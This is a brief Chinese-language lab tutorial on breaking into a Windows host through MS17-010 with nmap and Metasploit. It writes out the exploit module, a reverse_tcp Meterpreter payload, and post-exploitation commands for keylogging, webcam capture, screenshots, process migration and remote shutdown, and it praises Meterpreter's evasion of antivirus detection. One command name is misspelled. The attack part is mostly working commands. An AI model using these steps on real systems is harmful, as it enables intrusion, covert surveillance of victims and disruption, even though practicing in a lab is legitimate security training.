meterpreter简介

meterpreter的隐藏性特性可以使其躲开众多杀毒软禁啊以及基于主机入侵检测系统的检测。通过DLL注入方式，meterpreter可以附加到不同的进程上，它可以在这些进程之间进行切换。

基础使用

我们获取到的shell只是基础的情报收集。

有时候会限制我们的操作。

目标电脑

使用nmap进行ms17-010的漏洞判断

nmap --script=smb-vuln-ms17-010 192.168.30.133

使用msf

使用辅助模块

设置参数

结果

搜索ms17_010的漏洞利用

use exploit/windows/smb/ms17_010_psexec

查看参数

show options

执行

exploit

exploit模块选择错误，（系统是32位）

只能重新选择了

get到shell，使用payload是

payload windows/x64/meterpreter/reverse_tcp

获得目标shell

meterpreter功能使用

获取系统ID及计算机名称

getuid

获取当前进程

ps

打开记事本

终止进程

kill <PID>

获取当前进程标识符

getpid

获取当前meterpreter桌面

getdesktop

开启键盘记录

keyscan_start

终止键盘记录

keyscan_stop

转存从主机捕获的按键记录

keysscan_dump

捕获摄像头命令

webcam_snap

获取主机shell

shell

截取屏幕

screenshot

迁移进程

migrate <PID>

查看帮助信息

help或者？

shutdown -s -t 15 -c "this is hacking training"